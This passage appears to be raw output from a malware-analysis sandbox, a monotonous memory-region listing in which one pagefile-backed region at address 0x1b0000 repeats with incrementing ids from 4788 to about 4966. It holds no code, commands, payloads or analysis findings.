region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4788 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4789 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4790 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4791 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4792 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4793 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4794 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4795 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4796 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4797 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4798 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4799 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4800 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4801 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4802 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4803 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4804 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4805 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4806 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4807 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4808 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4809 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4810 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4811 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4812 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4813 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4814 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4815 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4816 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4817 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4818 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4819 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4820 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4821 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4822 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4823 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4824 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4825 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4826 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4827 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4828 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4829 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4830 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4831 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4832 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4833 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4834 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4835 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4836 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4837 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4838 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4839 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4840 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4841 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4842 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4843 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4844 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4845 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4846 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4847 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4848 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4849 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4850 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4851 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4852 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4853 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4854 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4855 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4856 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4857 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4858 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4859 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4860 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4861 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4862 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4863 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4864 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4865 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4866 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4867 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4868 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4869 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4870 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4871 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4872 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4873 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4874 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4875 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4876 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4877 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4878 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4879 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4880 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4881 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4882 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4883 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4884 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4885 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4886 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4887 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4888 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4889 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4890 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4891 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4892 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4893 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4894 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4895 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4896 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4897 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4898 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4899 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4900 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4901 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4902 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4903 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4904 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4905 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4906 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4907 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4908 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4909 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4910 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4911 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4912 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4913 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4914 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4915 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4916 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4917 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4918 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4919 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4920 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4921 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4922 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4923 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4924 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4925 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4926 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4927 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4928 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4929 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4930 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4931 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4932 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4933 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4934 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4935 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4936 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4937 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4938 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4939 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4940 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4941 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4942 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4943 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4944 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4945 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4946 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4947 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4948 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4949 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4950 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4951 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4952 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4953 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4954 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4955 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4956 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4957 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4958 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4959 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4960 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4961 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4962 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4963 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4964 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4965 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4966 start_va = 